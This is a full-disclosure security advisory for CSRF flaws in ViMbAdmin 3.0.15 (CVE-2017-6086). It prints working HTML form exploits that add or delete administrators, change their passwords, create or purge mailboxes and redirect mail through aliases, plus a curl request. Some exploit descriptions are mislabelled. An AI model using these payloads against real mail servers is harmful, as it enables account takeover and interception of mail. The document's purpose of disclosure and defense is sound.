[CVE-2017-6086] Multiple CSRF vulnerabilities in ViMbAdmin version 3.0.15

fulldisclosure logo
Full Disclosure
mailing list archives

[CVE-2017-6086] Multiple CSRF vulnerabilities in ViMbAdmin version 3.0.15


From: Sysdream Labs <labs () sysdream com>

Date: Wed, 3 May 2017 16:01:24 +0200


# [CVE-2017-6086] Multiple CSRF vulnerabilities in ViMbAdmin version 3.0.15

## Product Description

ViMbAdmin is a web-based interface used to manage a mail server with virtual domains, mailboxes and aliases. It is an 
open source solution developed by Opensolutions and distributed under the GNU/GPL license version 3. The official web 
site can be found at http://www.vimbadmin.net and the source code of the application is available on github 
https://github.com/opensolutions.

## Details

**CVE ID**: CVE-2017-6086

**Access Vector**: remote

**Security Risk**: high

**Vulnerability**: CWE-352

**CVSS Base Score**: 8.8

**CVSS vector**: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

## Proof of concept

### Add administrator user

#### Exploit

The following html/javascript code allows to delete an administrator user. It needs to be visited by a logged 
administrator of the targeted ViMbAdmin application.

```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>



<form id="csrf-form" action="http://<target ip>/admin/add" method="POST" target="csrf-frame" >
<input type="text" name="user" value="target@email" >
<input type="text" name="password" value="newpassword" >
</form>


document.getElementById("csrf-form").submit()

</body>

```

#### Vulnerable code

The vulnerable code is located in the `addAction()` method of the `<vimbadmin 
directory>/application/controllers/DomainController.php` file.

### Remove administrator user

#### Exploit

The following html/javascript code allows to delete an administrator user. It needs to be visited by a logged 
administrator of the targeted ViMbAdmin application.

```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>



<form id="csrf-form" action="http://<target ip>/admin/purge/aid/<administrator id>" method="GET" target="csrf-frame" >
</form>


document.getElementById("csrf-form").submit()

</body>
```

#### Vulnerable code

The vulnerable code is located in the `purgeAction()` method of the `<vimbadmin 
directory>/application/controllers/DomainController.php` file.

### Change administrator password

#### Exploit

The following html/javascript code allows to update administrator password. It needs to be visited by a logged 
administrator of the targeted ViMbAdmin application.

```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>



<form id="csrf-form" action="http://<target ip>/admin/password/aid/<administrator id>" method="POST" 
target="csrf-frame" >
<input type="text" name="password" value="newpassword" >
</form>


document.getElementById("csrf-form").submit()

</body>
```

#### Vulnerable code

The vulnerable code is located in the `passwordAction()` method of the `<vimbadmin 
directory>/application/controllers/DomainController.php` file.

### Add mailbox address

#### Exploit

The following html/javascript code allows to update administrator password. It needs to be visited by a logged 
administrator of the targeted ViMbAdmin application.

```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>



<form id="csrf-form" action="http://<target ip>/mailbox/add/did/<domain id>" method="POST" target="csrf-frame" >
<input type="text" name="local_part" value="<fakeemail>" >
<input type="text" name="domain" value="<domain id>" >
<input type="text" name="name" value="<fake name>" >
<input type="text" name="password" value="<password>" >
<input type="text" name="quota" value="0" >
<input type="text" name="alt_email" value="" >
<input type="text" name="cc_welcome_email" value="" >
</form>


document.getElementById("csrf-form").submit()

</body>
```

#### Vulnerable code

The vulnerable code is located in the `addAction()` method of the `<vimbadmin 
directory>/application/controllers/MailboxController.php` file.

### Purge mailbox

#### Exploit

The following html/javascript code allows to remove a mailbox address. It needs to be visited by a logged administrator 
of the targeted ViMbAdmin application.

```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>



<form id="csrf-form" action="http://<target ip>/mailbox/purge/mid/<mailbox id>" method="POST" target="csrf-frame" >
<input type="text" name="data" value="purge" >
</form>


document.getElementById("csrf-form").submit()

</body>
```

#### Vulnerable code

The vulnerable code is located in the `purgeAction()` method of the `<vimbadmin 
directory>/application/controllers/MailboxController.php` file.

### Archive mailbox

#### Exploit

The following html/javascript code allows to force the archival of a mailbox address. It needs to be visited by an 
administrator of the targeted ViMbAdmin application.

```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>



<form id="csrf-form" action="http://<target ip>/archive/add/mid/<mailbox id>" method="GET" target="csrf-frame" >
</form>


document.getElementById("csrf-form").submit()

</body>
```

#### Vulnerable code

The vulnerable code is located in the `addAction()` method of the `<vimbadmin 
directory>/application/controllers/ArchiveController.php` file.

### Add alias address

#### Exploit

The following html/javascript code allows to force the archival of a mailbox address. It needs to be visited by an 
administrator of the targeted ViMbAdmin application.

```html
curl 'http://<ip>/alias/add/did/<domain id>'  --data 'local_part=<fake mailbox>&domain=<domain 
id>&goto%5B%5D=<redirection email address>'
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>



<form id="csrf-form" action="http://<target ip>/alias/add/did/<domain id>" method="POST" target="csrf-frame" >
<input type="text" name="local_part" value="<fake mailbox>" >
<input type="text" name="domain" value="<domain id>" >
<input type="text" name="goto[]" value="<redirection email address>" >
</form>


document.getElementById("csrf-form").submit()

</body>
```

#### Vulnerable code

The vulnerable code is located in the `addAction()` method of the `<vimbadmin 
directory>/application/controllers/AliasController.php` file.

### Remove alias address

#### Exploit

The following html/javascript code allows the removal of a alias address. It needs to be visited by a logged 
administrator of the targeted ViMbAdmin application.

```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>



<form id="csrf-form" action="http://<target ip>/alias/delete/alid/<alias id>" method="GET" target="csrf-frame" >
</form>


document.getElementById("csrf-form").submit()

</body>
```

#### Vulnerable Code

The vulnerable code is located in the `addAction()` method of the `<vimbadmin 
directory>/application/controllers/AliasController.php` file.

## Affected version

* tested on version 3.0.15

## Timeline (dd/mm/yyyy)

* 22/01/2017 : Initial discovery.
* 16/02/2017 : First contact with opensolutions.io
* 16/02/2017 : Advisory sent.
* 24/02/2017 : Reply from the owner, acknowledging the report and planning to fix the vulnerabilities.
* 13/03/2017 : Sysdream Labs request for an update.
* 29/03/2017 : Second request for an update.
* 29/03/2017 : Reply from the owner stating that he has no time to fix the issues.
* 03/05/2017 : Full disclosure.


## Credits

* Florian NIVETTE, Sysdream (f.nivette -at- sysdream -dot- com)

-- 
SYSDREAM Labs <labs () sysdream com>

GPG :
47D1 E124 C43E F992 2A2E
1551 8EB4 8CD9 D5B2 59A1

* Website: https://sysdream.com/
* Twitter: @sysdream


Attachment:
signature.asc

Description: OpenPGP digital signature


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

  By Date  
     
  By Thread  

Current thread:

  • [CVE-2017-6086] Multiple CSRF vulnerabilities in ViMbAdmin version 3.0.15 Sysdream Labs (May 04)

Source: Full Disclosure @ May 4, 2017 at 03:48PM

0
Share